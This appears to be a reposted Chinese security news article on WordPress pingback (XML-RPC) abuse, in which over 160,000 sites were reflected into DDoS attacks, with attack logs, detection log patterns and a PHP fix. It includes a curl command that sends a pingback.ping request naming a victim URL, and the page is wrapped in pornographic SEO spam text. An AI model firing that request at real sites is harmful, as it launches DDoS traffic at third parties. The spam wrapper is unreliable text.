成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

超過16W的WordPress網(wǎng)站被用來做DDoS攻擊

安全 黑客攻防
任何開啟了Pingback(默認就開啟)的WordPress的站點可以被用來做DDOS攻擊其它服務(wù)器。

任何開啟了Pingback(默認就開啟)的WordPress的站點可以被用來做DDOS攻擊其它服務(wù)器。

超過16W的WordPress網(wǎng)站被用來做DDoS攻擊

看如下日志:

574.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com"
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr"
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de"
..

可以發(fā)現(xiàn)每次請求還增加了隨機數(shù)/?3162504=9747583以此來繞過緩存。

測試這種攻擊方式只需要一個curl命令就可以了:

$ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d 'pingback.pinghttp://victim.comwww.anywordpresssite.com/postchosen'

想要看你自己的網(wǎng)站是否被用來做了攻擊可以查看日志當中是否包含類似如下的內(nèi)容:

393.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://fastbet99.com/?1698491=8940641\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"
94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"

防御此問題的推薦方法需要屏蔽 XML-RPC (pingback) 的功能,WordPress主題中添加如下代碼:

add_filter( 'xmlrpc_methods', function( $methods ) {
unset( $methods['pingback.ping'] );
return $methods;
} );
責任編輯:藍雨淚 來源: 烏云知識庫
相關(guān)推薦

2022-03-31 06:13:24

DDoS網(wǎng)絡(luò)攻擊漏洞

2021-12-21 23:21:16

DDOS防御安全

2009-11-10 11:36:46

2011-03-04 17:23:17

2019-04-22 07:45:02

2013-05-22 15:45:43

2021-11-05 19:24:39

漏洞網(wǎng)絡(luò)安全DDoS攻擊

2014-06-13 10:00:01

2020-10-09 18:41:23

DDoS攻擊黑客網(wǎng)絡(luò)安全

2017-11-06 14:43:48

2015-08-31 10:14:40

2009-11-10 10:33:10

2014-07-01 09:54:13

2012-11-27 16:35:00

2018-03-19 08:46:52

2014-08-11 16:25:09

2021-11-28 14:14:40

勒索軟件惡意軟件安全

2017-03-23 13:44:39

2014-04-30 13:57:41

2014-12-24 09:28:00

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 99久久中文字幕三级久久日本 | 欧美人妇做爰xxxⅹ性高电影 | 99视频精品 | 国产一区二区精品在线 | 国产一区二区三区四区三区四 | 欧洲一级黄 | 久草在线视频中文 | 亚洲一区二区三区观看 | 日韩欧美在线观看 | 欧美性网 | 久久小视频 | av超碰| 成人av免费 | 天天拍夜夜爽 | 不卡的av在线 | 一区二区三区国产好 | 精品99爱视频在线观看 | 成年人免费网站 | 天天干,夜夜操 | 亚洲永久免费 | 亚洲一区在线播放 | 亚洲精品99久久久久久 | 欧美日韩一区在线 | 国产99免费视频 | 欧美一级一 | 国产精品成人一区 | 亚洲欧美激情四射 | 久久精选 | 狠狠躁夜夜躁人人爽天天高潮 | 亚洲精品一区二区三区蜜桃久 | 精品久久久久久久久久久久 | 日韩在线视频观看 | 高清一区二区三区 | 欧美日韩成人影院 | 国产精品久久久久久久久久 | 美女一级a毛片免费观看97 | 夜夜干夜夜操 | 久久久精品一区二区 | 国产精品毛片一区二区三区 | 三级黄色片在线 | 精品视频在线观看 |